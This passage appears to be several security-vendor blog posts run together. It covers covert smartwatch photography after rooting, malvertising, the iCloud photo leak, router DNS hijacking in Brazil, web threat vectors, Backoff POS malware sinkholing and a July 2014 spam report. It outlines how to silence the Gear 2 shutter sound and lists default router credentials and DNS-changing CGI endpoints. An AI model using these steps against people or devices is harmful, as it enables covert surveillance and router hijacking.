However, creepers will not be easily deterred! And a solution was swiftly proffered in the form of rooting and a handful of commands. Most people are familiar with the notion of rooting or jailbreaking a device these days. It is often touted as a means of retaking control of your device, away from the clutches of evil limiting corporations! In the case of the Gear 2, the uses of rooting are anything but benevolent. Rather than unleashing homebrew development creativity, the sole use of rooting the Gear 2 that I've been able to spot is to disable the moderately loud sound the device emits to notify passersby that they are in fact being photographed.
On more specific terms, the process includes the use of a leaked internal Samsung tool called ODIN in order to flash an alternate ROM onto the device that comes with root privileges enabled. Root privileges are not required in order to install applications themselves but will be necessary in order to mount the otherwise inaccessible filesystem. Once mounted, the creeper needs only zero-in on the folders that contain the camera notification sound files and move them elsewhere for safe-keeping. Thus, when a picture is being taken, the camera application will look for these files in vain and continue to take the picture sans shutter sound. Since the camera is quite discreetly placed, lacks a flash, and shows no other outward indication that a picture is being taken, this sound is a crucial privacy feature in the device's design.
With the Tizen Smart Developer Bridge (reminiscent of the Android Developer Bridge) in hand, semi-proficient users can also sideload applications in wgt format onto the device. In the case of video recordings, an altered camera app can be sideloaded that includes a single modified line within the package thus eliminating the pre-imposed limitation on video recording from a few seconds to as much as the cramped storage will allow. These two modifications allow a perverted user to turn the otherwise benevolent smartwatch into a rather creepy device.The Less-Scrutinized Link in the Mobile Security Chain
An interesting implication arises from being able to sideload modified applications onto the device with such ease. Though Tizen applications are meant to go through a rigorous testing process, this process occurs on the side of the controlling device – in this case, the Galaxy S5 loaded with the Gear Manager app paired to the smartwatch. When an application is installed on the device through the Gear Manager app via bluetooth, there are no indications or notifications on the smartwatch that a new application has been installed. This goes to stress the perils of the simplified interfaces on most wearable devices and thus the importance of maintaining the integrity of the controlling mobile device. With Android being a primary target for mobile attackers, rising consumer interest in wearables is bound to be met by rising attacker interest in these devices as well, which brings us to the prospective side of our discussion…
Laymen cybercriminals are not the only one's interested in our devices. Sophisticated actors have a distinct interest in infecting mobile devices as these become the gateway for intimate information about individual targets not commonly found on corporate networks. Though I would in no way claim that wearables are being targeted by these actors at this time, there is a twofold appeal presented by wearables that make them a likely future target if widely adopted by consumers:
- Firstly, the information wearables devices gather is going to attract new corporate players to the cyberespionage scene. If wearables are adopted by a large enough crowd, insurance companies interested in tweaking and improving their risk mitigation formulae will be jonesing to get their hands on the aggregated vital signs and unadulterated exercise details of their clients. This information could translate into real money for these companies and that sort of financial incentive is often enough to encourage less than ethical means of information gathering.
- Secondly, we need to be wary and adopt a holistic approach towards the security of a chain of devices paired for data sharing. When it comes to a home or office network, securing endpoints isn't enough. Any device on the network, even if it's a printer or a seemingly harmless network storage device, can represent an entry point or means of persistence for an attacker. The same occurs with mobile devices and their less sophisticated accessories.
In an espionage campaign, breaching the security of a mobile device is only the beginning. Oftentimes, valuable information will become available with long-term access to the device as the unsuspecting target goes on about their everyday dealings. Given that security solutions are already deployed on mobile platforms, less sophisticated appendages such as wearables connected to mobile devices could become particularly interesting to advanced threat actors looking for a means of persistence with a lower probability of detection. In this case, resilience and discreet execution are gold standards, and what is more discreet than operating within a device whose simplified interface and inaccessible filesystem essentially insure that the breach will never be detected by even the most competent users?
'Malvertising' is a relatively new term for a technique used to distribute malware via advertising networks, which have long since become a popular medium among cybercriminals. In the past four years, hundreds of millions of users have fallen victim to 'viral' advertising, including visitors to major media sites, such as NY Times, London Stock Exchange, Spotify, USNews, TheOnion, Yahoo!, and YouTube. The complicated situation with ad networks even prompted the United States Senate Permanent Subcommittee on Investigations to conduct an in-depth inquiry, which produced recommendations on stepping up security and increasing the responsibilities of advertising platform owners.
At the turn of the year 2.5 million Yahoo users were attacked. Soon after the incident, a company called Fox IT published a detailed analysis of the attack. Curiously, according to Fox IT, not all Yahoo! users were affected by the attack – only residents of European countries, primarily Romania, the UK and France. Fox IT analysts believe that the attackers probably used targeted advertising mechanisms, i.e., they paid for 'impressions' served to a certain audience from the countries mentioned above. Here is an illustration of how attacks are conducted via ad networks: an overall attack organization diagram (on the left-hand side) and a specific example of the attack against Yahoo! users (on the right-hand side).
In the past, we have written about targeted attacks conducted via trusted websites (so-called watering-hole attacks) and social engineering on social networks and in IM clients. Specifically, we wrote that a cybercriminal has to do two things in order to implement a watering-hole attack: first, compromise a trusted website and second, surreptitiously inject malicious scripts into the site's code. Successful attacks via social networks or IM clients also make certain demands of cybercriminals – at the very least, to win the users' trust and increase the chances of them clicking on links sent by the attackers.
What sets attacks via ad networks apart is that in these attacks the cybercriminals do not have to compromise websites or gain the trust of potential victims. All they have to do is find an ad provider from which to buy 'impressions' or become a provider themselves (like BadNews). The remaining work, related to distributing malicious code, will be done by the ad network –the trusted site itself will download malicious scripts to its page via iframe.
Moreover, users don't even have to click on the ads – as part of its attempt to display a banner on the web page, the browser executes the banner's SWF/JS code, which automatically redirects the user to a site hosting the landing page of a popular exploit pack, such as Blackhole. A drive-by attack will follow: the exploit pack will attempt to choose an appropriate exploit to attack a vulnerability in the browser or its plugins.
The problem of ad networks being used to distribute malware and conduct targeted attacks (taking advantage of their targeted advertising capabilities) does not only affect those who use browsers to access websites. It also applies to users of applications that can display adverts, such as IM clients (including Skype), email clients (Yahoo! included), etc. And, most importantly, the problem affects the huge number of mobile app users, since these apps also connect to ad networks!
Essentially, mobile applications are different in that the SDKs commonly used for embedding adverts into apps (such as AdMob, Adwhirl etc.) do not support the execution of arbitrary code supplied by ad providers, as is the case with website advertising. In other words, only static data is accepted from the server supplying ads, including images, links, settings etc. However, cybercriminals can also create SDKs, just like media companies. The former offer developers higher per-click rates than their legitimate competitors. This is why developers of legitimate mobile software embed malicious 'advertising' code – essentially backdoors – into their apps. Moreover, legitimate SDKs may have vulnerabilities enabling the execution of arbitrary code. Two such cases were identified late last year – one involving the HomeBase SDK, the other involving AppLovin SDK.
The question "How should a corporate network be protected against attacks conducted via ad networks?" does not have a simple answer, particularly if you keep in mind possible targeted attacks. As we mentioned before, protection needs to cover not only workstations (browsers, IM clients, email clients and other applications that have dynamic advertising built into them), but also mobile devices that can access the corporate network.
Clearly, protecting workstations requires at least a Security Suite class anti-malware solution, which must include:
- protection against vulnerability exploitation;
- advanced HIPS with access restriction features, as well as heuristic and behavioral analysis (including traffic analysis);
- tools for monitoring the operating system (System Watcher or Hypervisor) in case the system does get infected.
For more reliable protection of workstations, it is prudent to use application control technology, collect statistics (inventory) on the software used on the network, set up updating mechanisms and enable Default Deny mode.
Unfortunately, compared to the protection of workstations, mobile device protection is still in the early stages of evolution. It is extremely difficult to implement a full-scale Security Suite or Application Control solution for mobile devices, since that would require modifying firmware, which is not always possible. This is why Mobile Device Management (MDM) technology is currently the only effective tool for protecting mobile devices that connect to the corporate network. The technology can control which applications are allowed to be installed on a device and which are not.
Cybercriminals have used ad networks to distribute malware for years. At the same time, the advertising market is rapidly growing, branching out into new platforms (large websites, popular applications, mobile devices), attracting new advertisers, partners, intermediaries and aggregators, which are intertwined into an extremely tangled network. The ad network problem is one more example showing that rapid technology development is not always accompanied by the corresponding evolution of security technologies.
The biggest security news of the week is the leaked photos of many celebrities. Many people, especially the involved celebrities, wondered how such a hack could take place.
The initial statement by the attacker was that the iCloud was hacked. This prompted Apple into their we-do-not-really-comment-until-we-have-done-our-research mode. Today, they released a statement on the incident:
For me the most interesting quote is: “accounts were compromised by a very targeted attack on user names, passwords and security questions, a practice that has become all too common on the Internet.”
Apple is thus well aware of the problems that arise with these forms of authentication. The more interesting is their advice: strong passwords and two-step-verification.
Strong passwords are, according to Apple, passwords with a minimum of 8 characters, with some additional requirements. Interesting enough they do not enforce of all their suggestions. A password such as “Password1″ is acceptable, even though it can be easily guessed.
Their other advice, using two-factor-authentication is somewhat flawed. For instance, it does not protect your iCloud backups (see this post). Also, two-step-verification is not available in every country. If you use, for example, a Romanian or a Croatian telephone number, then bad luck. Considering that Google offers two factor authentication for such countries as well, one might wonder why Apple didn’t implement it as well. Could it be the cost of the SMSes?
So how to protect yourself properly? My colleague Alex Savitsky wrote an excellent article about this.
- Use strong and unique passwords that are easy to remember and hard to crack (for instance, a phrase in your native language with “spaces” in it, a number and a special char)
- If available in your country, enable two-factor authentication
- iPhone users may want to disable iCloud photo Stream / photo Sharing. Additionally iPhone users may want to delete the backup of their photos / iPhone in the iCloud.
Photo courtesy of my colleague Dmitry Bestuzhev – https://twitter.com/dimitribest/status/506820178320322560
And remember – if you don’t want your private photos to get leaked, better not take them in the first place!
We spotted an interesting attack from Brazilian bad guys aiming to change the DNS settings of home routers by using a web-based attack, some social engineering, and malicious websites. In these attacks the malicious DNS servers configured in the user's network device are pointed towards phishing pages of Brazilian Banks, programmed to steal financial credentials.
Attacks targeting home routers aren't new at all; in 2011, my colleague Marta described malware targeting network devices like these. In Brazil we documented a long and painful series of remote attacks that started in 2011-2012 that affected more than 4.5 million DSL modems, exploiting a remote vulnerability and changing DNS configurations. But this "web-based" approach was something new to Brazilian bad guys until now and we believe it will spread quickly amongst them as the number of victims increases.
The attack starts with a malicious e-mail and a bit of social engineering, inviting you to click:
"I'm your friend and want to tell you you're being cheated, look at the pics"
How many people believe in it? Well, many: 3.300 clicks in 3 days, with most of the users located in Brazil, US and China, probably Brazilians living there or people that understand Portuguese:
Shortened URLs are a cheap way for the bad guy measure their 'performance'
The website linked in the message is full of adult content, porn pics. While in the background it starts running scripts. Depending on your configuration, at some point the website may ask for the username and password of your wireless access point – if it has, this is a good thing. If not, this may be a problem for you:
The script located in the website will try to guess the password of your home router. It tries several combinations such as "admin:admin":
or "admin:gvt12345" (GVT is a big Brazilian ISP):
The scripts will continue trying combinations that point to the control panel of your network device such as [your-router-IP].rebootinfo.cgi or [your-router-IP].dnscfg.cgi?. Each script includes the commands to change the primary and secondary DNS servers. If you're using default credentials in your home router, there won't be an interaction and you'll never realize that the attack has occurred. If you're not using default credentials, then the website will pop up a prompt asking you to enter it manually.
We found Brazilian bad guys actively using 5 domains and 9 DNS servers – all of them hosting phishing pages for the biggest Brazilian Banks. The malicious websites used in the attacks are filtering direct access by using HTTP referrers, thus aiming to prevent direct access from security analysts.
So how do you protect yourself? Make sure you're not using the default password in your home router and NEVER enter your credentials into any website asking for them. Our Kaspersky Internet Security is also prepared to block such scripts automatically.
Anyone using the Internet is at risk, regardless of age and regardless of what they like to do online. Cybercriminals can deploy an impressive arsenal, targeting everyone from schoolchildren to pensioners and following them whether they are logged on to social networks, checking the latest headlines or watching their favorite videos. Internet scammers want access to our money, our personal data and the resources of our computer systems. In short, they want anything that they can profit from.
There are a huge range of different attacks facing us on the net: users can get caught by ransomware like Gimeno or Foreign, become part of the Andromeda botnet, see ZeuS/Zbot drain the cash from their bank accounts, or have their passwords compromised by Fareit spyware. Usually web attacks try to download and install an infected executable file on the target computer, but there are some exceptions, for instance XSS or CSRF, which execute embedded HTML code.Attack mechanism
For an attack to succeed, first of all users need to connect to a malicious site that downloads an executable file onto their computers. To tempt users to the resource, scammers might send them a link by email, SMS or via a social network. They might also try to promote their site via search engines. One further technique is to hack a popular legitimate resource and turn it into an instrument to attack its visitors.
Downloading and installing malware can be done in one of two ways. The first, a hidden drive-by download, relies on using a vulnerability in the user's software. The user of the infected site is often completely unaware that the computer is installing the malware, as usually there are no indications that this is happening.
The second method uses social engineering, where users are tricked into downloading and installing malware themselves, believing it is an updated flash player or some similar popular software.
Diagram of Internet attacks showing how executable malware files can be downloadedMalicious links and banners
The simplest way to lure victims to malicious sites is simply to display an attractive banner with a link. As a rule sites with illegal content, pornography, unlicensed software, films etc. are used as a host. Such sites can work "honestly" for a long time to build up an audience before they start hosting banners with links to malicious resources.
One popular infection method is malvertising, or the redirecting the user to a malicious site with the help of hidden banners. Dubious banner networks attract site administrators with high payments for 'click-throughs' on their ads and frequently earn money "on-the-side" by spreading malware.
When users enter the site displaying these banners, a so-called "pop-under" opens in the victim's browser. This is similar to a pop-up window, but it appears either under the main window of the site, or on an otherwise inactive neighboring tab. The contents of these "pop-unders" often depend on the location of the visitor to the site - the inhabitants of different countries are redirected to different resources. The visitors of one country might simply be shown an advert for example
Site sends American visitors to the resource watchmygfnet
Site sends Russian visitors to the resource runetkitv\
…whereas visitors from other countries will be attacked by exploit packs.
An inhabitant of Japan is attacked by an exploit and infected with the Zbot spyware Trojan
On occasion these malicious banners can even penetrate into honest banner networks, despite careful scrutiny by administrators. Cases like this have affected the Yahoo Advertising banner network and even YouTube.Spam
Spam is one of the most popular means of attracting victims to malicious resources. It includes messages sent by email, SMS and instant communications systems, via social networks, private messages on forums and comments in blogs.
A dangerous message might contain a malicious file or a link to an infected site. To encourage the user to click on a link or a file social engineering is used, for example:
- the name of a real organization or person is used as the sender's name,
- the letter pretends to be part of a legitimate mailshot or even a personal communication,
- the file is presented as a useful program or document.
During targeted attacks, when cybercriminals specifically attack a certain organization, the malicious letter might mimic a letter from a regular correspondent: the return address, content and signature could be the same as a genuine letter, for example from a partner of the company. By opening the attached document with a name like "invoice.docx" users put their computers at risk of infection.Black Search Engine Optimization
SEO or Search Engine Optimization is a collection of techniques to raise the position of a site in the results given by search engines. Modern users often go to search engines to find necessary information or services, so the easier it is to find a given site the more visitors it will get.
In addition to legitimate methods of optimization, those that are permissible in the eyes of the search engines, there are forbidden techniques that fool search engines. A site might "promote itself" with the help of a botnet - thousands of bots make certain search requests and select the malicious site, raising its rating. The site itself may adopt a different appearance depending on who has entered it: if it is a search robot it will be shown a page relevant to the request, if it is a normal user it will be redirected to a malicious site.
Also links to the site are distributed in forums and other sites known to search engines using special utilities, which raise the rating of the site and, consequently, its position in search results.
As a rule, sites that use black search optimization are actively blocked by search engine administrators. For this reason they are created by the hundred using automatic instruments.Infected legitimate sites
Sometimes cybercriminals infect popular legitimate sites in order to spread their programs. These might be high-traffic news resources, internet shops or portals and news aggregators.
There are two common ways to infect sites. If a software vulnerability was detected on the target site, malicious code can be inserted (for instance an SQL injection). In other cases the malefactors obtain authentication data from the site administrator's computer using one of the many Trojan spyware programs or using phishing and social engineering and seize control of the site. Once under the control of the criminals, the site can be infected in one way or another. The simplest approach is to use a hidden iframe tag with a link to the malicious resource added to the HTML code of the page.
Kaspersky Lab registers thousands of legitimate sites every day that download malicious code to their visitors with them being aware of it. Among the most prominent cases were the Lurk Trojan found on the site of the RIA Novosti news agency and gazeta.ru and the infection of PHP.Net
Visitors to an infected site are attacked with the use of hidden drive-by-downloads. The infection goes unnoticed by the users and does not require them to download or activate anything. An exploit, or set of exploits, is automatically downloaded from the page and, if the targeted machine has vulnerable software, a malicious executable is launched.Exploit packs
The most effective tool to infect a victim's computer is an exploit pack, such as Blackhole. These are hot products on the black market: exploit packs are developed to order or for widespread sale and are supported and updated. The price depends on the quantity and "freshness" of the exploits included, the ease of administration, the quality of the support, the regularity of updates and the greed of the seller.
As these attacks take place through the browser, the exploits have to use a vulnerability in either the browser itself, add-ons to it or third party software loaded by the browser to handle content. If one of these exploits is used successfully, a malicious file will be launched on the victim's machine.
Typical set of add-ons for the Internet Explorer browser that have permission to run by default. Add-ons the vulnerabilities in which are often used to attack a system are underlined in red.
An effective pack will contain exploits for useful vulnerabilities in popular browsers and their add-ons, and also for Adobe Flash Player and other popular programs. Often exploit packs have tools for fine tuning and collecting infection statistics.
Styx exploit pack control panelDirect download by users
Quite often cybercriminals don't need ingenious and expensive tools to insert their malicious programs onto users' computers. Users can simply be fooled into downloading and running malware themselves.
For instance, on entering a malicious site a user sees a preview video "for adults only". Clicking on this brings up a message to update Adobe Flash Player, and at the same time the site immediately offers him a file to download with an authentic sounding name. By installing the "update" the user infects the computer with a Trojan.
Message appearing when trying to view an "adult" video on a malicious site
Or a web-page might appear imitating the "My Computer" window, saying that a large number of viruses have been detected on the computer. And nearby a window opens offering a free "antivirus" program to cure the problems.
An apparent offer to install a free antivirus program hiding a TrojanInfection via social networks
Instructions for the installation of a semi-automatic Facebook worm
After these actions are carried out the worm activates and begins collecting data on the user, sending links to itself to the victim's contacts, awarding "likes" to various posts. This last option is a paid service that the owner of the worm offers to customers. And so we come to the reason why cybercriminals go to all this trouble and break the law.Money, money, money
Naturally nobody is attacking our computers for the intellectual challenge — the aim is money. One very popular way of illegally making money from victims is the use of Trojan ransom-ware, making it impossible to use the computer until a certain sum has been paid.
Having penetrated the user's computer the Trojan determines the country where the infected computer is and shows the victim the corresponding disable screen, containing threats and instructions on how to pay the ransom. The language of the message and the payment method suggested by the cybercriminals both depend on the user's country.
Usually the evildoers accuse the user of looking at child pornography or some other illegal action and then threaten a criminal investigation or to make the matter public. The assumption is that the victim will take these threats seriously and won't risk seeking help from law enforcement agencies. In some cases the Trojan ransom-ware may threaten to destroy the contents of the hard disk if the ransom is not paid quickly.
The disable screen that Trojan-Ransom.Win32.Foreign shows users in the USA
The cybercriminals offer the option of paying this "fine" by sending an SMS to a premium number or making a money transfer using one of the payment systems. In return the user should receive an unblocking key to deactivate the Trojan, but in practice this doesn't always happen.
Maintaining a communication channel with the victim can lead law enforcement agencies to the criminals and they frequently prefer not to take the risk, leaving the victim with a practically useless computer.
Another common method of illegal moneymaking is the collection and sale of users' confidential data. Contact details and personal data are tradable commodities that can be sold on the black market, albeit not for a great deal of money. However, it can be a profitable sideline, especially as the collection of information does not necessarily require any malware infection. Often the victims themselves supply all the necessary information — the important thing is for the site hosting the form for the entry of data to appear reliable and authentic.
A false site collecting contact details and personal information of visitors and then signing them up for paid mobile services
Banking Trojans bring their operators large profits. These programs are designed to steal money from users' bank accounts using distance banking systems. Malware of this type steals users' authentication data for online banking systems. Usually this is not enough as almost all banks and payment systems require authentication using several factors - entering an SMS code, inserting a USB key etc. In these cases the Trojan waits until the user makes a payment using internet banking and then changes the payment details, diverting the money to special accounts from which the criminal can cash out. There are other ways around two factor authentication: the Trojan might intercept messages with single use passwords or freeze the system at the moment the USB key is inserted, leaving the user powerless while the criminals hijack the operation and steal the money.
Finally, another profitable business is running botnets. The infected computers in a botnet can, unnoticed, be used by the evildoers for various money-making activities: mining bitcoins, sending spam, carrying out DDOS attacks, and boosting sites' ratings through search requests.Counteracting threats
As we have already shown, internet threats are diverse and can threaten users almost anywhere — when reading their mail, interacting on social networks, checking the news or simply surfing. There are also many ways to protect against these threats, but they can be summarized in four keys pieces of advice:
- Always pay attention to what you are doing on the Internet: which sites you visit, which files you download and what you run on your computer.
- Do not trust messages from unknown users and organizations, do not click on links and do not open attachments.
- Regularly update frequently-used software, especially software that works with your browser
- Install up-to-date defenses and keep anti-virus databases current.
It all sounds very simple, but the growing number of infections clearly demonstrates that too many users fail to take their safety seriously and neglect to follow this advice. We hope that our overview of current internet threats will help improve the situation.
There is currently a lot of buzz about the Backoff point-of-sale Trojan that is designed to steal credit card information from computers that have POS terminals attached.
Although very thorough, the existing public analyses of Backoff are missing a very relevant piece of information: the command-and-control (C&C) servers. However, if you have access to the samples it isn't hard to extract this information. At the end of this document, you can find a full list together with other IOCs (indicators of compromise).
Backoff malware configuration, with C&Cs
We sinkholed two C&C servers that Backoff samples used to communicate with their masters. These C&C servers are used by certain samples that were compiled from January - March 2014. Over the past few days, we observed over 100 victims in several countries connecting to the sinkhole.Statistics:
There were several interesting victims among them:
- A global freight shipping and transport logistics company with headquarters in North America.
- A U.K.-based charitable organization that provides support, advice and information to local voluntary organizations and community groups.
- A payroll association in North America.
- A state institute connected with information technology and communication in Eastern Europe.
- A liquor store chain in the U.S.
- An ISP in Alabama, U.S.
- A U.S.-based Mexican food chain.
- A company that owns and manages office buildings in California, U.S.
- A Canadian company that owns and operates a massive chain of restaurants.
There are also a lot of home user lines, mostly in the U.S. and Canada, connecting to the sinkhole. This is to be expected as many smaller businesses generally tend to run those rather than dedicated corporate connections.Conclusions
The success of Backoff paints a very bleak picture of the state of point-of-sale security. Our sinkhole covers less than 5% of the C&C channels and the sinkholed domains only apply to certain Backoff samples that were created in the first quarter of this year. Yet, we've seen more than 85 victims connecting to our sinkhole.
Most of these victims are located in North America and some of them are high profile. Taking into account the U.S. Secret Service statement, it's a pretty safe bet that the number of Backoff infections at businesses in North America is well north of 1,000.
Since its appearance last year, Backoff has not changed dramatically. The author created both non-obfuscated and obfuscated samples. This was likely done to defeat the security controls on the targeted networks. However, the defenses running on a PoS terminal and/or network should not have been affected by this. This speaks volumes about the current state of PoS security, and other cybercriminals are sure to have taken note.
It's very clear that PoS networks are prime targets for malware attacks. This is especially true in the US, which still doesn't support EMV chip-enabled cards. Unlike magnetic strips, EMV chips on credit cards can't be easily cloned, making them more resilient. Unfortunately, the US is adopting chip and signature, rather than chip and PIN. This effectively negates some of the added security EMV can bring.
This may prove another costly mistake. Not adopting EMV along with the rest of the world is really haunting retail in the U.S. and the situation is not likely to change anytime soon.IOCs / C&Cs: Trojan file paths:
Festive spam in July was largely dedicated to the holy month of Ramadan. Unwanted correspondence also included offers to send promotional messages to users' phones and email boxes. We also came across fraudulent emails asking for help with investments. There were offers of beauty products and services too.Ramadan
In July, spammers continued to exploit the holy month of Ramadan by offering mass mailing services. The emails were written in English. The subject and the text of the emails attracted readers with special offers and discounts in honor of the main Muslim holiday. Mass mailings advertising SMS distribution to residents of the United Arab Emirates were sent from free email services and designed in the same style. The emails used different text fonts and provided different contact details: for example, the phone numbers in the body of the message and in the subject of the email were different. Some emails indicated the site of a company engaged in SMS-marketing.
"Nigerian" scammers did not bother to invent anything new either and tried to attract users' attention by wishing them a Happy Ramadan both in the subject of the email and in the body of the message. Fraudulent emails that offered impressive rewards for help in investing money in a business project were circulated in both English and Arabic.
Current spam flows often include emails in different languages. In particular there has been an increase in the number of messages in Semitic languages, including Arabic, over the year. At the same time the scammers use English in the subject of the emails rather than Arabic. This is probably because English is more widespread and they hope an English subject will attract more readers.
One of the emails was written allegedly on behalf of a Muslim mother. It mentioned the complicated political situation in Syria and explained that this made it impossible to safely invest money at home. In this case, the content of the message suggests the author must know Arabic so a text in this language can be used to make it look more credible.
Among July's major mailings there was a notable campaign offering a variety of skin care products for women as well as promotions for beauty clinics. Spam mailings were used to sell different cleansers, anti-wrinkle creams, "elixirs of youth" and other cosmetic products. The scammers offered product samples to convince the user of their merits and promised to return the money if the results were unsatisfactory. The fraudsters tried to encourage potential customers by promising quick and free shipping to any country.
Beauty clinics were actively offering laser hair removal procedures at considerable discounts or even free of charge to supposed lottery winners. The sales pitch, complete with pictures, focused on the pressing need for this procedure before relaxing on the beach. Sometimes these emails were "noised" with texts that had nothing to do with the advertised goods and services. In some cases, this "noise" took up half the message (see the example below). The senders' names in these emails were a randomly generated combination of letters and numbers. The names of advertised centers and clinics were also mentioned in the body of the message to make it easier to find them via the search engine. However the links in the emails led to spammer parked sites registered on newly created domains. Sometimes they offered similar goods or services; sometimes they promoted completely different ones.
The heat of the summer has warmed up the market for products that help us to cool down: spam traffic actively promoted sun-protected foil for windows, fans and air conditioners, including repair and maintenance services. We often came across emails advertising water coolers and bottled water. Water was offered with special summer discounts and free delivery to homes and offices, while an extra bonus promised a free basket of fruit with every order in July or August. Making an order is as simple as calling the number in the advert.
Sunglasses were among the most popular summer offers. Knock-offs of designer sunglasses were offered at huge discounts compared to the original. Such emails often contained the designer logos and included icons of different social networks where the company is officially represented. However, these icons were merely decorative and offered no link to these sites. They were simply intended to make the email seem more realistic. Once users clicked on the link in the email, they were redirected to a newly created online sunglasses store. The names of the sites often included the words 'glasses' or 'sunglasses'. Sometimes you could even visually identify the distorted name of the glasses brand in the random set of letters and numbers which comprised the address of the site.Statistics The percentage of spam in email traffic
The percentage of spam in email traffic averaged 67%, which is 2.2 percentage points up from June. The highest spam levels were seen during the second week of the month (67.6%), and the lowest levels were seen in the first week (66%).
Percentage of spam in email trafficThe geographical distribution of spam sources
In July, the list of the most popular sources of spam around the world looked like this:
Sources of spam around the world
The USA took first place (15.3%) after its percentage increased 2.2 percentage points from the previous month. Next, Russia came in second place with 5.6%; the amount of spam originating in that country was down 1.4 percentage points. China was in third place with 5.3% having produced 0.3 pp less spam than in June.
Argentina was in 4th position with 4.2% of all distributed spam; its contribution remained practically unchanged but the country still climbed one place in the rankings. It is followed by Ukraine (4.1%) with a 0.9 pp rise compared to June.
In July, we saw the 1.8 pp reduction in the amount of spam from Vietnam (3.5%) which pushed this country from 4th to 8th place.
France rounded up the Top 10 with 2.63% of all distributed spam having pushed India (2.59%) to 11th position.Malicious attachments in email
The graphic below shows the Top 10 malicious programs spread by email in July.
The Top 10 malicious programs spread by email
This time the rating was topped by Trojan.Win32.Yakes.fize, the Trojan downloader Dofoil. This program downloads a malicious file on the victim computer, runs it, steals the user's personal information (especially passwords) and forwards it to the fraudsters.
The notorious Trojan-Spy.HTML.Fraud.gen dropped out of top spot for the first time in many months. Readers may remember that this is the threat that appears as an HTML phishing website and sends emails disguised as important notifications from banks, online stores, and other services.
Next came Trojan.JS.Redirector.adf which is the HTML page containing code to redirect users to a scammer site offering downloads of Binbot, the service for automatic sales of binary options which are currently very popular in the Internet. This malicious program is distributed via email attachments.
It is followed by Backdoor.Win32.Androm.enji. This malicious program is a modification of Andromeda – Gamarue, a universal modular bot which is a basis for building a botnet with a variety of features. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.
Fifth position is occupied by Trojan-Banker.Win32.ChePro.ink. This downloader appears in the form of a CPL applet (a component of the control panel) and, as is typical for this type of malware, it downloads Trojans developed to steal bank information and passwords. These banking Trojans mainly target online customers of Brazilian and Portuguese banks.
Trojan-Ransom.Win32.Cryptodef.ny ended 8th in July. This malicious program encrypts files on computers, blocks the screen and asks the user to pay to restore the files.
Rounding off the Top 10 was Trojan.Win32.Bublik.cran. The main functionality of the Bublik malware family is the unauthorized download and installation of new versions of malware onto victim computers.
Distribution of email antivirus detections by country
July's Top 3 remained unchanged from June. Germany accounted for 11.7% of all antivirus detections and topped the rating (+4.71 percentage points). The USA was second with 9.82% (+0.28 pp). The UK was third with 6.9% (+0.10 percentage points).
India (5.16%) overtook Brazil (3.94%) and came fourth having increased its share by 0.54 percentage points. Italy moved up two steps to 5th in the rating (+1.2 pp).
Russia increased its contribution by 1.37 percentage points averaging 3.40% of all antivirus detections and climbing from 13th to 8th position.
The UAE saw a noticeable drop in antivirus detections – a 1.09 pp fall saw it lose six places on the ranking.
The July Top 20's newcomer was Poland which occupied 19th place with 1.42% of all antivirus detections.
The percentage of email antivirus detections in other countries did not change significantly in June.Special features of malicious spam
In July, we saw an increase in the number of fake Portuguese language notifications = sent on behalf of the popular smartphone messenger WhatsApp.
In another case, the fake message notified the recipient that after months of hard work WhatsApp for PC could now enable users to chat with friends in real time via their computer. To add to the intrigue the message claimed that 11 people had already sent friend request to the recipient. To find out who these 11 people were, the user had to download the latest version of the Messenger for PC by clicking on the link in the email. Noticeably, we have been registering different versions of this message since the beginning of 2014.
As in the previous cases, instead of the desired program the user received a ZIP-archive which contained the dropper Trojan-Dropper.Win32.Dapato.egel. Its task is to connect to a remote Brazilian host then download and run a Trojan banker designed to steal the user's financial data. The dropper also copies itself to C:\Documents and Settings\Administrator\Local Settings\Application Data\ under the name of BaRbEcuE.exe. There it creates a file called windataup.inf, in which it indicates its presence and states the current date. Finally it writes itself into the AutoRun, ensuring it is launched automatically.Phishing
In July 2014, Kaspersky Lab's anti-phishing component registered 20,157,877 detections.
Phishers attacked users in Brazil most often: at least once during the month the Anti-Phishing component of the system was activated on computers of 18.17% of Brazilian users. This surge in activity is probably related to the football World Cup that took place in the country in June and July.
The geography of phishing attacks*, June 2014
* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users
Top 10 countries by the percentage of attacked users:Country % of users 1 Brazil 18.17 2 India 12.99 3 Australia 11.10 4 France 10.73 5 Kazakhstan 10.62 6 UK 10.15 7 UAE 10.14 8 Dominican Republic 10.11 9 Canada 9.61 10 Ukraine 9.53 Targets of attacks by organization
The statistics on phishing targets is based on detections of Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page while information about it is not included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning about a potential threat.
In our previous reports we referred to the Top 100 organizations when analyzing the most attractive targets for phishing attacks. In July, we analyzed the statistics for all organizations that were attacked.
In July, the Global Internet portals category continued to top the rating of organizations most often attacked by phishers (29.49%) although its share decreased by 2.67 pp. Social networks came second with 14.61%, a 3.2 pp decline from the previous month.
Organizations most frequently targeted by phishers, by category – July 2014
Below is a similar chart for the previous month:
Organizations most frequently targeted by phishers, by category – June 2014
Financial phishing accounted for 41.85% of all attacks, a 7.86 pp growth compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems was up 2.25, 2.64 and 2.29 pp respectively. The most significant spike affected PayPal (3.24%) up 2.27 pp in July.
We came across an interesting example of PayPal phishing at the end of the month. The fraudulent email informed the recipient about an incoming payment from a Craiglist user (most likely, it is the incorrect spelling of Craigslist, the site of e-ads) but the money could not be transferred because of an error with a PayPal account.
The email arrived from the address which does not belong to PayPal. In addition, it is impersonal which is a typical feature of a phishing email
To solve the problem, the user was asked to immediately download the attached form, open it and fill it in.
The form was created using the design elements of the PayPal site
The attackers are phishing for the user's email address and a password for it, his full name and date of birth, his mother's maiden name, his address, his credit card number, its expiry date and CVV as well as any passwords for Verified by Visa or MasterCard SecureCode. This detailed personal information would make it easy for fraudsters to rob the user of all electronic savings.
If you look at the HTML code of the page, you can see that all the data entered in the form will be sent to a page that has nothing to do with PayPal.Top 3 most organizations most frequently targeted by phishers Organization % detections 1 Google Inc 11.64% 2 Facebook 9.64% 3 Windows Live 6.28%
In July, Google services were most heavily targeted by phishing links: their share made up 11.64% of all Anti-Phishing component detections.
